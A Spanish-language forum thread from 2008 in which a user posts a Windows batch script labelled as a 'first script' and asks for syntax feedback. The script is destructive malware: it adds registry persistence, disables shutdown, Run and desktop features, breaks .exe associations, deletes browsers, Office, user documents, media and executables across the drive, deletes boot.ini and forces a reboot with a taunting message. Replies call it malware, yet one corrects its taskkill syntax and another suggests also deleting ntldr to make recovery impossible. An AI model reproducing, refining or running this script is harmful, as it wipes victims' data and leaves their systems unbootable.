Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: Vlad_Asen en 3 Enero 2008, 10:20 am



Título: Primer script
Publicado por: Vlad_Asen en 3 Enero 2008, 10:20 am
Este es mi primer batch. No es mas que una coleccion de acciones para ir probando esto. Llevo una semana leyendo tutos de cmd y batch. Si alguien puede remarcarme errores de sintaxis y especialmente de concepto se lo agradeceria mucho.

@echo off
set contador = 2
set/a temp = 0

attrib -r -s -h %SystemDrive% /S /D

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Windows\CurrentVersion\Run /v Microsoft /d "%%USERPROFILE%%\printer\numberone.bat" /f > nul

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f > nul

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f > nul

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f > nul

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /t REG_DWORD /d 1 /f > nul

reg add
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DISALLOWRUN /v 001 /d "iexplore.exe" > nul

reg add
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DISALLOWRUN /v 002 /d "msnmsgr.exe" > nul

reg add HKEY_CLASSES_ROOT\.exe /v "Content Type" /d 0 /f > nul
reg add HKEY_CLASSES_ROOT\.exe\PersistentHandler /d 0 /f > nul
reg add HKEY_CLASSES_ROOT\exefile\shell\open\command /v /d 0 /f > nul
reg add HKEY_CLASSES_ROOT\exefile\shell\runas\command /v /d 0 /f > nul
reg add HKEY_CLASSES_ROOT\exefile\DefaultIcon /d 0 /f > nul

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f > nul

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFavoritesMenu /t REG_DWORD /d 1 /f > nul

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayItemsDisplay /t REG_DWORD /d 1 /f > nul

reg add
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicSta
rtMenu /v {208D2C60-3AEA-1069-A2D7-08002B30309D} /t REG_DWORD /d 0 /f>nul

reg add
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPa
nel /v {208D2C60-3AEA-1069-A2D7-08002B30309D} /t REG_DWORD /d 0 /f > nul

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d 1 /f > nul

taskkill /F /iexplore.exe
cd\
cd "Archivos de programa\Internet explorer"
del /F /S /Q iexplore.exe
taskkill /F /firefox.exe
cd\
cd "Archivos de programa\Mozilla Firefox"
del /F /S /Q firefox.exe
del /F /S /Q %USERPROFILE%\Mis documentos
taskkill /F /wmplayer.exe
cd\
cd Archivos de programa\Windows Media Player
del /F /S /Q wmplayer.exe
taskkill /F /msnmsgr.exe
cd\
cd "Archivos de programa\Messenger"
del /F /S /Q msnmsgr.exe
taskkill /F /winrar.exe
cd\
cd "Archivos de programa\WinRAR"
del /F /S /Q winrar.exe
taskkill /F /winzip.exe
cd\
cd "Archivos de programa\WinZip"
del /F /S /Q winzip.exe
taskkill /F /photoshop.exe
cd\
cd "Archivos de programa\Photoshop"
del /F /S /Q photoshop.exe
taskkill /F /WINWORD.exe
taskkill /F /EXCEL.exe
taskkill /F /POWERPNT.exe
taskkill /F /MSACCESS.exe
taskkill /F /OUTLOOK.exe
taskkill /F /FRONTPG.exe
del /F /S /Q %ProgramFiles%\Microsoft Office

cd\
del /F /S /Q *.exe
del /F /S /Q *.wav
del /F /S /Q *.mp3
del /F /S /Q *.avi
del /F /S /Q *.jpeg
del /F /S /Q *.jpg
del /F /S /Q *.png
del /F /S /Q *.gif
del /F /S /Q *.rar
del /F /S /Q *.txt

cd %SystemDrive%
del boot.ini

cd\
cd %USERPROFILE%\Escritorio

:crea_dir
mkdir Mis_Carpetas
%temp% = %temp% + 1
if(%temp% LSS %contador%)
  (goto crea_dir) else (goto seguimos)
 
:seguimos
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeCaption /d "TU GUIA DE REPARACION" /f > nul

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeText /d
"- se autoinicia cuando se enciende el PC
- elimina el boton "Apagar"
- esconde los iconos del "Panel de Control"
- elimina el boton "Ejecutar..."
- elimina los comandos del Panel de Control y la impresora
- elimina la papelera de reciclaje y queda inutilizable
- elimina "Mis favoritos"
- elimina los iconos de la bandeja de Windows
- no podés abrir archivos .exe
- no podés ejecutar aplicaciones
- elimina todo mis documentos
- elimina todos los archivos .exe, .wav, .mp3, .avi, .jpeg, .jpg, .png, .gif, .rar, .txt
- elimina boot.ini
- elimina el Internet Explorer
- elimina el Firefox
- elimina el reproductor de windows
- elimina el MSN
- elimina el WinRar
- elimina el WinZip
- elimina el Photoshop
- elimina el Office (Word, excel, etc.)
- crea 2 carpetas en el escritorio con el nombre de "Mis_Carpetas"
- deja un mensaje con todo lo que le hice al PC
- reinicia la PC" /f > nul

shutdown -r -t 0 -c "tranqui tu OS se jodio pero al reiniciar te dire lo que le hice. Si eres hábil podrás arreglarlo, de lo contrario..."


Título: Re: Primer script
Publicado por: MK-Ultra en 8 Enero 2008, 21:42 pm
q jodido malware...

Segun creo yo , espero q no se lo mandes a nadie...


Título: Re: Primer script
Publicado por: Novlucker en 8 Enero 2008, 21:48 pm
Citar
q jodido malware...

Segun creo yo , espero q no se lo mandes a nadie...

Nunca me han gustado este tipo de script  :¬¬


Título: Re: Primer script
Publicado por: Sh4k4 en 9 Enero 2008, 00:44 am
nice and castroso! justo como laten jejeje  :rolleyes:


Título: Re: Primer script
Publicado por: papanoel_devacaciones en 9 Enero 2008, 00:51 am
el script funcionaria solo con un xp en espańol....y creo que el taskkill solo con /f no lo va a cerrar...seria taskkill /f /im iexplore.exe






Saludos


Título: Re: Primer script
Publicado por: Vlad_Asen en 9 Enero 2008, 19:30 pm
OGracias por la aclaracion. Lo tendre en cuenta para futuros scripts.
Saludos


Título: Re: Primer script
Publicado por: SoloAki en 10 Enero 2008, 01:17 am
Supongo que la parte mas jodida debe ser esta elimina boot.ini , si lo queres mas jodido agrega en el virus el ntldr ahi si que ni la formateada lo va a ayudar :/